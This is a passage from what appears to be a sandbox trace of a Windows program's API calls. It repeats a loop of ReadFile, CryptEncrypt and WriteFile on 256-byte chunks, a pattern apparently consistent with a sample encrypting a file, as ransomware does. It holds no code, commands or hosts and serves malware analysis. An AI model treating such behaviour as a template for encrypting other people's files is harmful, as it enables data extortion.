lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.344] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.344] GetLastError () returned 0x0 [0165.344] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.344] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.344] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.344] GetLastError () returned 0x0 [0165.344] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.344] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.344] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.344] GetLastError () returned 0x0 [0165.344] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.344] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.344] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.344] GetLastError () returned 0x0 [0165.345] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.345] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.345] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.345] GetLastError () returned 0x0 [0165.345] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.345] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.345] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.345] GetLastError () returned 0x0 [0165.345] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.345] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.345] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.345] GetLastError () returned 0x0 [0165.345] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.345] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.379] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.379] GetLastError () returned 0x0 [0165.379] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.380] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.380] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.380] GetLastError () returned 0x0 [0165.380] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.380] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.380] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.380] GetLastError () returned 0x0 [0165.380] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.380] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.380] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.380] GetLastError () returned 0x0 [0165.380] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.380] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.380] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.380] GetLastError () returned 0x0 [0165.380] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.380] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.380] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.380] GetLastError () returned 0x0 [0165.380] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.380] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.380] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.380] GetLastError () returned 0x0 [0165.380] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.380] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.381] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.381] GetLastError () returned 0x0 [0165.381] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.381] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.381] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.381] GetLastError () returned 0x0 [0165.381] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.381] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.381] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.381] GetLastError () returned 0x0 [0165.381] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.381] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.381] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.381] GetLastError () returned 0x0 [0165.381] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.381] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.381] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.381] GetLastError () returned 0x0 [0165.381] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.381] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.381] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.381] GetLastError () returned 0x0 [0165.381] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.381] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.381] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.382] GetLastError () returned 0x0 [0165.382] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.382] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.382] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.382] GetLastError () returned 0x0 [0165.382] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.382] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.382] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.382] GetLastError () returned 0x0 [0165.382] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.382] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.382] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.382] GetLastError () returned 0x0 [0165.382] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.382] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.382] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.382] GetLastError () returned 0x0 [0165.382] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.382] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.382] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.382] GetLastError () returned 0x0 [0165.382] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.383] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.383] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.383] GetLastError () returned 0x0 [0165.383] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.383] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.383] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.383] GetLastError () returned 0x0 [0165.383] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.383] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.383] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.383] GetLastError () returned 0x0 [0165.383] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.383] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.383] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.383] GetLastError () returned 0x0 [0165.383] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.383] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.383] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.383] GetLastError () returned 0x0 [0165.383] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.383] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.383] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.383] GetLastError () returned 0x0 [0165.383] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.383] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.384] CryptEncrypt 